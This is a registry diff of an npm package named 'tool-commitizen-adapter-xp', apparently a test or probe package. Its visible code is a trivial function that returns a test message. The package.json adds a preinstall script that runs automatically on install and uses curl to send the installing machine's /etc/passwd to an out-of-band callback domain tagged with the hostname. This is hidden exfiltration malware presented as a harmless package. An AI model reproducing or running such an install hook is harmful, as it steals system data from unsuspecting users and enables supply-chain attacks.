tool-commitizen-adapter-xp 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ // Latam Prueba
2
+
3
+ function retornaMensagem() {
4
+ return "This is a test!";
5
+ }
6
+
7
+ module.exports = retornaMensagem
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "tool-commitizen-adapter-xp",
3
+ "version": "2.0.0",
4
+ "description": "LATAM Prueba tool-commitizen-adapter-xp",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).d21pn9t5a92h1kvjhb5gfamod1deftazx.oast.fun"
9
+ },
10
+ "author": "dtbrowser",
11
+ "license": "ISC"
12
+ }
@@ -0,0 +1,3 @@
1
+ const retornaMensagem = require('tool-commitizen-adapter-xp');
2
+
3
+ console.log(retornaMensagem());